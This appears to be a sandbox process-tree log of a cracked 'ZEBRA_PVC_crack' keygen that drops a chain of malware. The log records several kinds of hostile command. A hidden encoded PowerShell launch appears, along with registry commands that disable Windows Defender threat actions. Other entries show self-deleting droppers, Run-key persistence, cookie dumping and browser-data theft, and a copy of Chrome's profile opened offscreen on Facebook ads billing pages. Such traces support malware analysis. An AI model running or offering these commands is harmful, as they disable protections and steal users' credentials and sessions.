C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6784 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7184 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7472 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7628 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7648 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7788 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7796 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8160 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8432 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8552 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8872 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9012 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1672 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8676 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8648 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=908 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9020 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4028 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4028 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9020 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=6572 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,12052002820617248949,17004416221358428753,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7732 /prefetch:82⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\MUXPNae.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\MUXPNae.exe 9n /site_id 754 /S2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"3⤵
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_ZEBRA_PVC_crack.zip\ZEBRA_PVC_crack.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_ZEBRA_PVC_crack.zip\ZEBRA_PVC_crack.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\CCD1.tmp.exe"C:\Users\Admin\AppData\Roaming\CCD1.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\CCD1.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe" 1 3.1617022315.6061cd6bc9127 1016⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PVM8QWOMMT\multitimer.exe" 2 3.1617022315.6061cd6bc91277⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\qhwnn02hhy2\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qhwnn02hhy2\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TAKIK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-TAKIK.tmp\Setup3310.tmp" /SL5="$203D6,138429,56832,C:\Users\Admin\AppData\Local\Temp\qhwnn02hhy2\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-57P50.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-57P50.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\VR\Versium Research\RunWW.exe"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6388 -s 76812⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
-
C:\Program Files (x86)\VR\Versium Research\customer5.exe"C:\Program Files (x86)\VR\Versium Research\customer5.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge13⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome13⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe"C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵
-
C:\Program Files (x86)\VR\Versium Research\22.exe"C:\Program Files (x86)\VR\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4077614.exe"C:\ProgramData\4077614.exe"12⤵
- Executes dropped EXE
-
C:\ProgramData\4264480.exe"C:\ProgramData\4264480.exe"12⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵
- Executes dropped EXE
-
C:\Program Files (x86)\VR\Versium Research\lylal220.exe"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AH1OK.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-AH1OK.tmp\lylal220.tmp" /SL5="$305EA,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-IPE2V.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-IPE2V.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows Media Player\WZOAZXKSJD\irecord.exe"C:\Program Files\Windows Media Player\WZOAZXKSJD\irecord.exe" /VERYSILENT14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-L4T6N.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-L4T6N.tmp\irecord.tmp" /SL5="$30434,6265333,408064,C:\Program Files\Windows Media Player\WZOAZXKSJD\irecord.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\63-69fa6-423-65f90-6852e4ab524d7\Lyvolaquzha.exe"C:\Users\Admin\AppData\Local\Temp\63-69fa6-423-65f90-6852e4ab524d7\Lyvolaquzha.exe"14⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbxr5vua.a1n\gaooo.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\qbxr5vua.a1n\gaooo.exeC:\Users\Admin\AppData\Local\Temp\qbxr5vua.a1n\gaooo.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jmn0bif.35m\md7_7dfj.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\3jmn0bif.35m\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\3jmn0bif.35m\md7_7dfj.exe16⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ofkzhzu3.ima\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\ofkzhzu3.ima\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ofkzhzu3.ima\askinstall31.exe16⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe6dc86e00,0x7ffe6dc86e10,0x7ffe6dc86e2018⤵
-
